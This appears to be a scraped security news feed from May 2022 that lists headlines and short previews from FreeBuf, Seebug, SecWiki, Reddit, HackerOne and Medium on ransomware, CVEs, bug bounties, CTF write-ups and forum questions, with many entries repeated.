    根据 Group-IB 的数据,2021 年的平均赎金需求为 247000 美元,比上一年增加了 45%。
    手把手教你实现tomcat内存马
    手把手教你实现tomcat内存马,快来学习吧。
    信捷PLC编程软件zip slip漏洞:CVE-2021-34605研究
    信捷PLC编程软件V3.5.1存在zip slip漏洞,攻击者在打开特殊制作的项目文件时,可获得任意文件写入权限。
    德州近200万个人信息被曝光了三年
    近日,由于德州保险部门(TDI)的一个编程问题,德克萨斯近200万人的个人信息被暴露了近三年。
    Conti团伙威胁推翻哥斯达黎加政府
    近日,勒索软件团伙Conti向哥斯达黎加政府发出威胁要“推翻”该国政府。
    VMware 修补了多个产品中的关键身份验证绕过漏洞
    VMware 多个产品中出现关键身份验证绕过漏洞,漏洞允许攻击者获取管理员权限。
    微软:警惕针对 MSSQL 服务器的暴力攻击
    微软正对使用MSSQL数据库服务器的用户发出安全警告,警惕攻击者利用弱密码对暴露在网络上的 MSSQL发动暴力攻击。
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    A new way to bypass `__wakeup()` and build POP chain
    作者:1nhann 原文链接:https://inhann.top/2022/05/17/bypass_wakeup/ 本文以 Laravel 9.1.8 为例,介绍一个通用的新思路,用以绕过 pop chain 构造过程中遇到的 __wakeup() 环境搭建 Laravel 9.1.8 routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows域内提权漏洞分析
    作者:dre4merp 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 本文更多的是根据调试Windows Server 2003,分析漏洞成因。 阅读本文需要一定的Kerberos基础知识、Windows源码阅读调试能力。单纯的阅读可能并不能完全理解其中的关键点,需要进行调试理解。 背景 漏洞编号为:CV...
  • Open

    A new way to bypass `__wakeup()` and build POP chain
    作者:1nhann 原文链接:https://inhann.top/2022/05/17/bypass_wakeup/ 本文以 Laravel 9.1.8 为例,介绍一个通用的新思路,用以绕过 pop chain 构造过程中遇到的 __wakeup() 环境搭建 Laravel 9.1.8 routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows域内提权漏洞分析
    作者:dre4merp 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 本文更多的是根据调试Windows Server 2003,分析漏洞成因。 阅读本文需要一定的Kerberos基础知识、Windows源码阅读调试能力。单纯的阅读可能并不能完全理解其中的关键点,需要进行调试理解。 背景 漏洞编号为:CV...
  • Open

    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    K8s 集群稳定性:LIST 请求源码分析、性能评估与大规模基础服务部署调优
    对于非结构化的数据存储系统来说,LIST 操作通常都是非常重量级的,不仅占用大量的 磁盘 IO、网络带宽和 CPU,而且会影响同时间段的其他请求(尤其是响应延迟要求极高的 选主请求),是集群稳定性的一大杀手。 例如,对于 Ceph 对象存储来说,每个 LIST bucket 请求都需要去多个磁盘中捞出这个 bucket 的全部数据;不仅自身很慢,还影响了同一时间段内的其他普通读写请求,因为 IO 是共享的,导致响应延迟上升乃至超时。如果 bucket 内的对象非常多(例如用作 harbor/docker-registry 的存储后端),LIST 操作甚至都无法在常规时间内完成( 因而依赖 LIST bucket 操作的 registry GC 也就跑不起来)。 又如 KV 存储 etcd。相比于 Ceph,一个实际 etcd 集群存储的数据量可能很小(几个 ~ 几十个 GB),甚至足够缓存到内存中。但与 Ceph 不同的是,它的并发请求数量可能会高 几个量级,比如它是一个 ~4000 nodes 的 k8s 集群的 etcd。单个 LIST 请求可能只需要 返回几十 MB 到上 GB 的流量,但并发请求一多,etcd 显然也扛不住,所以最好在前面有 一层缓存,这就是 apiserver 的功能(之一)。K8s 的 LIST 请求大部分都应该被 apiserver 挡住,从它的本地缓存提供服务,但如果使用不当,就会跳过缓存直接到达 etcd,有很大的稳定性风险。 本文深入研究 k8s apiserver/etcd 的 LIST 操作处理逻辑和性能瓶颈,并提供一些基础服务的 LIST 压力测试、 部署和调优建议,提升大规模 K8s 集群的稳定性。 kube-apiserver LIST 请求处理逻辑: 代码基于 v1.24.0,不过 1.19~1.24 的基本逻辑和代码路径是…

  • Open

    Bug Bounty Diaries #1
    Hi guys! I have a lot of things to say on this blog and the truth is that I didn’t try to exploit anything because WOW! Continue reading on Medium »
    Hack First, Bounty Later
    Two months ago we came across an interesting and somewhat provocative Tweet. Continue reading on Medium »
    How to Install airixss
    Hello all, we will see how to install airixss on kali linux. Continue reading on Medium »
    Creo Engine Presents ‘Evermore Knights Bug Bounty Contest’
    Creo Engine is developing its first game called “Evermore Knights” and Creo Engine recognizes the importance of security researchers in… Continue reading on Medium »
    Methods to Exploit HTML Injection
    In this article, we will discuss the HTML Injection vulnerability, and 3 methods of how to creatively leverage it for exploitation. Continue reading on Medium »
  • Open

    Anonymous Social Network Yik Yak Breached Precise GPS Locations
    submitted by /u/mkdtsh [link] [comments]
    Hack The Box - Timing - Writeup by Mădălin Dogaru
    submitted by /u/Madalin_Dogaru [link] [comments]
    Variant Cloud Analysis
    submitted by /u/Gallus [link] [comments]
    Wizard Spider hacking group detailed analysis
    submitted by /u/wtfse [link] [comments]
    TProxy: Wireshark dissection with manual and scripted interception
    submitted by /u/mexicanw [link] [comments]
  • Open

    Clipboard
    Can websites read/access our entire clipboard contents? I'm scared because I have my passwords,documents(passport/ID), pictures of me etc. saved on my clipboard. I obviously don't want any website viewing my clipboard...especially not the p*rn, or any unsafe sites I visit or even those phishing sites I got redirected to. I don't click or enter any login credentials on such sites but obviously do use the search bar. I don't even actually paste anything from my clipboard on these sites tho let me clear that. Or do they just see what I copied recently onto my clipboard? Help needed. I'm looking for an accurate and realistic answer and not some conspiracy theories. Thanks. submitted by /u/hamza_x17 [link] [comments]
    Excel & Power Bi for security/ data analysis
    Hi. Do you know any courses/blogs where excel or power bi are using for data analysis and building cool scharts? I very often use excel and to analyze data from Azure/SIEM/network data/user activity: bulding stats (pivot) or visualisation data (any timelines). Creating any formulas such as "how long the user has been inactive") or any parsing data. And I'm intresting in additional courses for excel/power bi for data analysis to improve my skills. What courses do you used? submitted by /u/athanielx [link] [comments]
    What network security monitoring (NSM) product do you know?
    Hi there. I'm looking for NSM producs (it can be open-source too). We in the company want to implement NSM. The first option is to organize everything by our resources on the base Zeek & Suricata & ELK (log manager), but I'm afraid it will be difficult to manage and support by our not large team. So, the second point is to delegate it to 3-party. The closest was to me Corelight, but they don't have agent for our envirement. AC-Hunter was intersting for me too, but they have main focus on C2 detection and some builn-in threat intel, so it's not enouth for our NSM. submitted by /u/athanielx [link] [comments]
    Analyze MP3 file for viruses
    I understand that MP3 files can contain viruses. Can you please suggest a way to analyze it apart from virustotal and other online AV ? Thanks submitted by /u/AnotherRedditUsr [link] [comments]
    Need Career Advice
    Hi I'm working as an Java Automation tester for 1 and half years. I'm not satisfied with my job and salary. I'm more interested in cybersecurity, from last year August I started learning Ethical Hacking and Pentesting principle. I have completed few basic rooms in THM and starting point machines in HTB(with help of hints from writeups). I can't quit my job right now and also I want to switch my domain. How do I get atleast entey level position in Cybersecurity? submitted by /u/sunilprashanthh [link] [comments]
    How to land a SOC analyst job without degree
    I need a reality check. All the employers are looking for experienced worker, however, there is no way to gain experience due to can't even land a job. Currently a helpdesk without any prior security experience. I've been applying entry level security jobs since January 2021. It seems really hard to land any entry level job here without CS or related degree. Just wondering if there is way to breakthrough the security field. If there is anything training program or certification can help me, please advise. submitted by /u/ChillaxJ [link] [comments]
  • Open

    Bypass global deny-lists by wrapping domains using "[]" in https://github.com/stripe/smokescreen
    Stripe disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1528242 - Bounty: $500
    Conduit feed.publish API allows you to spoof other users or make it look like you have access to a restricted object
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1566325 - Bounty: $300
  • Open

    War in Ukraine / May 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    GEOINT#1 — Sino-Myanmarese Borders
    During my daily waste of time on Douyin (抖音, the Chinese TikTok), I felt on the following video: Continue reading on Medium »
    GEOINT#1 — Frontières Sino-Birmanes
    Durant ma perte de temps quotidienne sur Douyin (抖音, le TikTok chinois), je suis tombé sur la vidéo suivante: Continue reading on Medium »
    Moonshot Team Spotlight #01
    We are pleased to share our new Moonshot Team Spotlight Series. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-18 Review
    SSTI漏洞基础解析 by SecIN社区 微信小程序反编译 by ourren 一种基于Graph Kernel的API使用示例选择方法 by ourren 来自五眼联盟的全球最佳网络安全指导意见 by ourren 快速上手云原生安全平台 NeuVector by ourren Cobalt Strike 分析:CS元数据编码和解码 by ourren 2021年十大网络安全漏洞&“Lazarus”组织介绍 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-18 Review
    SSTI漏洞基础解析 by SecIN社区 微信小程序反编译 by ourren 一种基于Graph Kernel的API使用示例选择方法 by ourren 来自五眼联盟的全球最佳网络安全指导意见 by ourren 快速上手云原生安全平台 NeuVector by ourren Cobalt Strike 分析:CS元数据编码和解码 by ourren 2021年十大网络安全漏洞&“Lazarus”组织介绍 by ourren 更多最新文章,请访问SecWiki
  • Open

    calculus notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    FreeBuf早报 | Conti勒索团伙放话推翻政府;俄黑客组织发视频向美乌10国宣战
    在哥斯达黎加政府拒绝支付赎金后,Conti勒索软件团伙声称对袭击负责。现在,Conti 勒索软件团伙威胁要“推翻”该国的新政府。
    HackMyVM-hostname
    这台靶机是上周刚刚发布的一台靶机,其中一处的提取手法对个人而言很是新颖,所以想记录一下。
    智能汽车曝出重大漏洞,黑客10秒开走特斯拉
    整个攻击过程只需要不到10秒钟即可打开车门,并且可以无限重复攻击。
    NVIDIA修复了Windows GPU显示驱动程序中的十个漏洞
    NVIDIA发布了针对各种显卡型号的安全更新。
    黑客利用Tatsu WordPress 插件漏洞,进行数百万次攻击
    Tatsu Builder 中存在远程代码执行漏洞 CVE-2021-25094,黑客正在利用其进行大规模网络攻击。
    警惕间谍软件!逾200 Playstore应用程序或存在风险
    近日,研究人员观察到有超过200个Android应用程序正在传播一款名为Facestealer的间谍软件。
    委内瑞拉心脏病专家被指控是Thanos勒索软件的幕后主使
    美国司法部指控了一名来自委内瑞拉的 55 岁医生是Thanos勒索软件的幕后策划者,并通过销售该勒索软件从中获取了大量利润。
    未来智安:XDR打破数据孤岛,降低无效告警 | 网安新势力SOLO发布季
    本期节目请到了攻防安全新势力,北京未来智安科技有限公司创始人兼CEO唐伽佳先生,发布《浅谈XDR扩展威胁检测与响应》的议题。
    浅谈企业SOAR项目建设
    SOAR已经出现好几年了,更多的小伙伴还是在观望中。一起探讨一下SOAR项目建设。
  • Open

    Target=“_blank” – the most underestimated vulnerability ever (2021)
    Article URL: https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/ Comments URL: https://news.ycombinator.com/item?id=31421473 Points: 22 # Comments: 4
  • Open

    Attacking and Defending Active Directory : Bootcamp Review
    Hello Guys, Continue reading on Medium »
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    Nextcloud CVE-2022-24890: A call moderator can indirectly enable user webcams
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-24890 Comments URL: https://news.ycombinator.com/item?id=31419833 Points: 3 # Comments: 0

  • Open

    USB Devices Redux
    Back in 2005, Cory Altheide and I published the first paper on tracking USB storage devices across Windows systems; at the time, the focus was Windows XP. A lot has happened since then...I know, that's an understatement...as the Windows platform has developed and expanded, initially with Vista, then Windows 7, and even with Windows 10 there have been developments that have come (and gone) just between the various Win10 builds. With respect to USB devices in particular, not long ago, we (the community) became aware that the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log contained quite a bit of information (see this post for event IDs to track) that a digital forensic analyst could use to determine if and when USB devices had been connected to (and disconnected from) the…
  • Open

    Home Firewalls
    What are your favorite small-end firewalls and why? Are there any features or capabilities that you were particularly impressed with? Any lessons learned that can be shared from your experience? submitted by /u/Noah_Ahn [link] [comments]
    Burp Suite Arm64 Linux???
    Im using an M1 Macbook Air and Im learning Burp Suite with TryHackMe. I use a virtual machine for anything hacking / osint related but the problem is, Burp Suite isn't available for Linux arm64. Should I just switch back to my mac when i want to use burp or just not use it at all? submitted by /u/Puzzleheaded-Bid7382 [link] [comments]
    What are the fault lines in Cyber Security in 2022?
    Almost every discipline and industry has it's fault lines. These are areas where, among experts, there are fundamental disagreements on how a problem should be approached or solved. But what are the fault lines in Cyber Security in 2022? submitted by /u/astillero [link] [comments]
    Looking for what to watch on malware file changes, excerpt in comments
    I was reading this from a site (minerva labs) and am wondering, are these file changes things that are logged in windows? how do you keep track of such fine tuned changes? " Before executing any malicious code, a couple of anti-emulation techniques are used. First, the malware calls SetFileAttributesA with the parameters “C:\windows\Explorer.exe” and FILE_ATTRIBUTE_NORMAL (0x80) and if the function succeeds the malware will exit. Secondly, the malware calls the function WriteFileGather with the invalid handle 0, and exits if the return value is not 0. " submitted by /u/networkalchemy [link] [comments]
    Android malware found in personal laptop memory dump
    Hello. I'm a newbie to the security field and I'm looking for advice on how to proceed with a strange situation. As part of a class I used Ramcapturer to dump my memory and analyze it with Winhex. Here is a sample of the strange values I found: talkbacktstakeextraordinaryscreenshotsendurltologblockappdescr_or_urlMonitoringTool:AndroidOS/PhoneSpy.C connectorcontroller beginattack:senddata/hacking/my programs/source/cocoa/zapattack/udpfloodercontroller.hTrojanDropper ±mitmopsmitmserver There are many more including some for MacOS. This dump is after I reinstalled a fresh copy of windows. Malware scans do not turn anything up. At one point, I believe I was being investigated due to business ties with some white collar people. At that time I did have an Android, but now I have an iPhone. I believe the laptop was contaminated by contact with either an old router or an old USB stick. Questions: How can I safely analyze and erase the MBR /GPT on my NVME SSD, since everything was disconnected during reinstall? What programs could give more insight into my RAM? Is it safe to run my OPNSense firewall to see what my network is doing? How about Security Onion on proxmox? Thanks! submitted by /u/Beneficial-Monk-4165 [link] [comments]
    CTI
    I am trying to get into CTI as a beginner into Cyber. Any recommendations? submitted by /u/knappyboy1 [link] [comments]
    Weird stuff happening on my laptop.
    Hi! Lately I've been noticing weird stuff happening on my laptop. I haven't been visiting any shady sites or downloaded free games. I noticed that my background has changed twice by itself. First time it changed to some low resolution picture of sky but there were stars drawn on it. The second time it changed to also low resolution picture, but this time it was a picture of lighting. I can't provide a picture of the two backgrounds because I don't know where they are saved. I also noticed that Chrome is downloading stuff by itself, but I can't see what. I looked at the downloads history and I can't find anything new. I don't know if this is related, but a while ago an error message appeared on my screen and it said that it is having problems downloading an extension for Chrome and it needed my approval to retry the download, but I haven't been downloading any extensions on my laptop. Later that day I wanted to check something on my laptop and there was a message "No bootable device". I would like to know why it happens and I would be very grateful if someone on this subreddit answers my question. Goodbye. :-) submitted by /u/Programmer2009 [link] [comments]
    Flatpak adequate for this scenario?
    I'm concerned about potentially malicious extensions in my vscode, and I'm considering flatpak to mitigate this rather than going the full blown VM route. My thinking is a bit jumbled on this though, so I'd like it if I could hear someone else's thought process behind their own security precautions for more sensitive things like vscode. I'm a student, but I hope to begin freelancing after I acquire adequate skills, so that will be an additional security concern on top of just not wanting my system infected. submitted by /u/NoBuyer49 [link] [comments]
  • Open

    BackendTwo — HackTheBox — Writeup
    Hello guys sorry for uploading late. I didn’t had time so let’s start talking. Btw this box is UHC box. (Ultimate Championship Hacking)… Continue reading on Medium »
    Bug Bounty Diaries #0
    Hi guys I’m back with another blog and I know it’s been a while but I’m so exicted because with this blogs I’ll explain my way on bug… Continue reading on Medium »
    Want to learn Account Takeover? I got you
    Introduction Continue reading on Medium »
    CLV Wallet Bug Bounty Campaign
    Reward Pool of 100,000 CLV! Continue reading on Medium »
    What hacking is and why it matters!
    When people hear about hacking, there are different connotations to it! But the common interpretations of the term “hacking” in many… Continue reading on Medium »
    SQLI — Intro to Databases
    Before we learn about SQL injections, we need to learn more about databases and Structured Query Language (SQL), which databases will… Continue reading on Medium »
  • Open

    Stealing Google Drive OAuth tokens from Dropbox
    submitted by /u/staz0t [link] [comments]
    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher [link] [comments]
    Hacking Swagger-UI - from XSS to account takeovers
    submitted by /u/albinowax [link] [comments]
    EMBA v1.0 - Black Hat Singapore Edt. - Version 1.0 of the firmware security analyzer EMBA is released
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    Bir e-posta adresinden hangi bilgileri alabiliriz?
    Osint tekniks Continue reading on Medium »
    War in Ukraine / May 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The General Theory for Open Source Intelligence in brief (A proposal)
    With the proposal of a “General Theory” for Open Source Intelligence (GT/OSINT) we attempt to formulate an innovative process for the… Continue reading on Medium »
  • Open

    Nighthawk 0.2 - Catch Us If you Can - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-05-17 Review
    情报的三大核心、四大要素、一个关键问题 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-17 Review
    情报的三大核心、四大要素、一个关键问题 by ourren 更多最新文章,请访问SecWiki
  • Open

    Integer overflow vulnerability
    Glovo disclosed a bug submitted by 0f1c3r: https://hackerone.com/reports/1562515
    [app.lemlist.com] Improper handling of payment lead to bypass payment
    lemlist disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1420697
  • Open

    Emotet Summary: November 2021 Through January 2022
    We review recent activity from the Emotet malware family, covering changes in Emotet operations since its revival in November 2021. The post Emotet Summary: November 2021 Through January 2022 appeared first on Unit42.
  • Open

    Law enforcement forensics career transition
    I am currently a digital forensics analyst for law enforcement. I want to transition into cyber/info security but I am having a hard time understanding what jobs I could apply for. My experience doesn’t really align with much. I’ve been looking at infosec analyst roles. Law enforcement is dead box forensics. All home computing devices, and we know exactly what we’re looking for. Never do malware analysis and networking stuff. I’ve studied all the domains with sec+ but haven’t actually paid to sit the exam because I’d rather a company fund it. Any advice? submitted by /u/gofigured21 [link] [comments]
    Analyzing Page File for Malware
    Hello everyone, I was analyzing a page file for malware. I ran strings to extract the strings from it, and found lots of suspicious strings. I then started looking at the strings on my own host PC for a comparison, upon examining my hosts pagefile I found some strings that are suspicious but no where near the amount in comparison to the system I'm examining, and windows defender wont allow me to open the text file in notepad due to a potential virus. Ive scanned both pagefiles outputs with malware bytes and no hits on them, but when scanning with windows defender I get multiple hits for various CVE's and Trojans. So my question is is this normal when examining pagefiles, I was thinking that It could be something extracted from windows defender in the pagefile? submitted by /u/NoImaginationForThis [link] [comments]
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    linear algebra notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Rari Capital 攻击事件的分析和复现
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 4月30日, Rari Capital的几个借贷池遭受闪电贷重入攻击, 约受损8000万美金. 漏洞原理与去年我分析过的Cream 第四次被黑类似, 但攻击方式更加优雅, 故有此文. 漏洞起因: Compound起的坏头 老牌Defi...
    三次价格操纵的恶意攻击事件汇总
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 以下是对2022年上半年3个独立攻击事件的汇总分析, 虽然漏洞原理各不相同, 但他们都有一个共同点: 攻击者不再只依赖FlashLoan进行Single-Transaction-Attack(我自己瞎起的说法). 而是真金白银地砸出数...
  • Open

    Rari Capital 攻击事件的分析和复现
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 4月30日, Rari Capital的几个借贷池遭受闪电贷重入攻击, 约受损8000万美金. 漏洞原理与去年我分析过的Cream 第四次被黑类似, 但攻击方式更加优雅, 故有此文. 漏洞起因: Compound起的坏头 老牌Defi...
    三次价格操纵的恶意攻击事件汇总
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 以下是对2022年上半年3个独立攻击事件的汇总分析, 虽然漏洞原理各不相同, 但他们都有一个共同点: 攻击者不再只依赖FlashLoan进行Single-Transaction-Attack(我自己瞎起的说法). 而是真金白银地砸出数...
  • Open

    FreeBuf早报 | 英国制定核网络安全战略;美国制造业巨头被 Conti 攻击
    美国制造业巨头被 Conti 攻击。
    360高级攻防实验室郑同舟:知白守黑,用手中的矛铸心中的盾
    网络安全更需要攻防演练,利用那根锋利的长矛,找到盾牌上的薄弱点。知白守黑,郑同舟和360高级攻防实验室已经做好了准备,只待大风起。
    苹果紧急更新修复入侵Mac和Watch的零日漏洞
    近日,苹果发布了安全更新以解决一项新的零日漏洞,黑客可以利用该漏洞对Mac和Apple Watch设备发起攻击。
    iPhone曝出新的攻击面,即使关闭也可运行恶意软件
    攻击者可篡改固件并将恶意软件加载到蓝牙芯片上,使该芯片在 iPhone “关闭”时执行。
    六方云 安全态势周刊丨第199期
    业界动态尽收眼底,安全事件一览无遗
    因在暗网出售被盗凭据,乌克兰黑客被判四年监禁
    因在暗网出售登录凭据, 28 岁的乌克兰人被判处 4 年监禁。
    HTML附件在网络钓鱼攻击中至今仍很流行
    根据2022年第一季度的调研表明,HTML文件仍然是网络钓鱼攻击中最流行的附件之一。
    HW在即,那些被遗忘的物理安全还好吗?
    高端的黑客往往只采用最朴素的攻击方式。
    FreeBuf早报 | 意大利多个政府网站遭DDoS攻击瘫痪;苹果紧急修复零日漏洞
    苹果公司发布了安全更新,以解决零日漏洞,威胁行为者可以利用该漏洞攻击MAC和Apple Watch设备。
  • Open

    Modern Technology Exploits and Analysis
    Continue reading on Medium »

  • Open

    [case study#1] IDOR vulnerability allows access to user’s personal data
    What is IDOR? Continue reading on Medium »
    The Bucket’s Got a Hole in it
    Introduction Continue reading on Medium »
    Bug Bounty от Meta Pool
    Meta Pool опубликовал в своем gitBook программу Bug Bounty, в которой может участвовать любой, кто обнаружит ошибку или уязвимость в… Continue reading on Meta Pool Russia »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Bounty Hacker Walkthrough — Try Hack Me
    You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove… Continue reading on System Weakness »
  • Open

    Malcolm v6 released on GitHub, now including Suricata and more new protocol parsers
    submitted by /u/mmguero [link] [comments]
    F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE
    submitted by /u/sciencestudent99 [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.2
    submitted by /u/smaury [link] [comments]
    From Project File to Code Execution: Exploiting XINJE PLC Program Tool
    submitted by /u/derp6996 [link] [comments]
    SMM Callouts in HP Products
    submitted by /u/lightgrains [link] [comments]
    GitHub - gabriel-sztejnworcel/pipe-intercept: Intercept Windows Named Pipes communication using Burp or similar HTTP proxy tools
    submitted by /u/gabrielszt [link] [comments]
    Technical Advisory – Blueooth Low Energy Proximity Authentication Vulnerable to Relay Attacks
    submitted by /u/digicat [link] [comments]
  • Open

    Computer image analysis - online trials
    There was a website where you could download a computer image and you would answer questions about the image to finish the challenge (who last logged on?, etc.) and I can't seem to find it again. Does something like that still exist? submitted by /u/hamsterbilly [link] [comments]
    Password protected RAR file!
    I have a password protected RAR file in one of my servers, it was found in the system folder, I am not considering it a malware because its size is 90MB+ but I do want to know what's inside it! Bruteforce doesn't seem like a good idea, what other options do I have? Looking for help and guidance of good people of computer forensics!! submitted by /u/Supra02 [link] [comments]
  • Open

    Privilege Escalation on TikTok for Business
    TikTok disclosed a bug submitted by naaash: https://hackerone.com/reports/1505567 - Bounty: $2500
    Site information's Display Name section vulnerable for XSS attacks and HTML Injections.
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1554888 - Bounty: $150
    Security misconfiguration
    lemlist disclosed a bug submitted by mr23r0: https://hackerone.com/reports/1486327
    CVE-2022-27781: CERTINFO never-ending busy-loop
    curl disclosed a bug submitted by sybr: https://hackerone.com/reports/1555441
    HTTP Request Smuggling in Transform Rules using hexadecimal escape sequences in the concat() function
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1478633 - Bounty: $6000
  • Open

    Check the public GitHub repositories for CVE vulnerabilities
    Article URL: https://memgraph.com/blog/graph-data-zagreb-summary-april-2022 Comments URL: https://news.ycombinator.com/item?id=31402433 Points: 1 # Comments: 0
  • Open

    An OS tool for storing, searching, and displaying news wires
    An OSINT way to read, analyse, and compare news outlets which use Telegram. Continue reading on Medium »
    War in Ukraine / May 14–15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT: Do I have to Capture The Flag? Pt2.
    Making a persona that’s even faker than your social media identity. Continue reading on Medium »
  • Open

    Putting the team in red team
    One of the more common questions we receive during a red team scoping call or RFP Q&A call is, how many dedicated consultants will be involved in the assessment? There is no “correct” answer to this question, and ultimately, the answer as to how red team engagements are staffed comes down to how the consultancy... The post Putting the team in red team appeared first on TrustedSec.
  • Open

    Block calendy.com spam
    All, is there a good way to block someone trying to spam us using calendy.com without simply blocking everything from calendy.com? Situation: We have some folks who are getting hammered by someone sending constant Calendy event invites. I'm guessing it's some sort of bot as there are several different gmail addresses as the other invitee. submitted by /u/twrolsto [link] [comments]
    What jobs to look for after Vulnerability Analyst / Management?
    I want to start getting the needed requirements and experience for a position after this, but I'm not sure what job title I would be searching for, or what comes next in the chain of jobs. I would like to go to a more red-team focused role, but honestly, my main aim is a better salary submitted by /u/Dependent-Context-43 [link] [comments]
    How do you make writing reports more pleasant? [Penetration tests]
    Hi, I've been writing reports for a while now but I'm struggling big time. Our methodology is pretty complicated and I want to automate it. We write the vulnerabilities with Mark Down, render with pandoc into a word file, then take it and merge it with the word template. Then validate and make corrections and export it to PDF. The good part with is that we don't have to fix styles when writing it, but I'm sure there must be a better way to do it. I've researched few options but can't find a good one. I'm thinking about creating web app with a DB containing all the vulnerabilities that were used in the reports, so it will be easier to import them. Some of them for example for missing headers will only have an option to import an image with the proof of concept with previously prepared static text containing information. In other vulnerabilities that need additional writing there will be placeholders. Somehow I think my idea will take way too long, any ideas or tips will be highly appreciated. Ps. I've notice taking trashy notes slows down additionally my Reporting process. Can you suggest me on editors like one note(including images) but which you can use on both Windows and Linux? Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    Sysmon on Linux
    Hi Everyone, What is your take on installing sysmon on Linux hosts in terms of volume, beneficially, and is there any configuration file same as SwiftOnSecurity for Windows? Your detailed information is highly appreciated submitted by /u/azizalmarfadi [link] [comments]
    Security consultant interview tips
    I have a graduate security consultant interview next week and would like a few tips on how to impress the interviewer (they are a senior member of the company). I really want this role as I want to push myself this year. Many thanks! submitted by /u/Appreciatingthegoods [link] [comments]
  • Open

    API Security Offence and Defence: Introduction to API
    submitted by /u/cybersocdm [link] [comments]
    I'm new to binary exploitation and my interest lie in security for IOT devices. I need suggestions on what I should learn
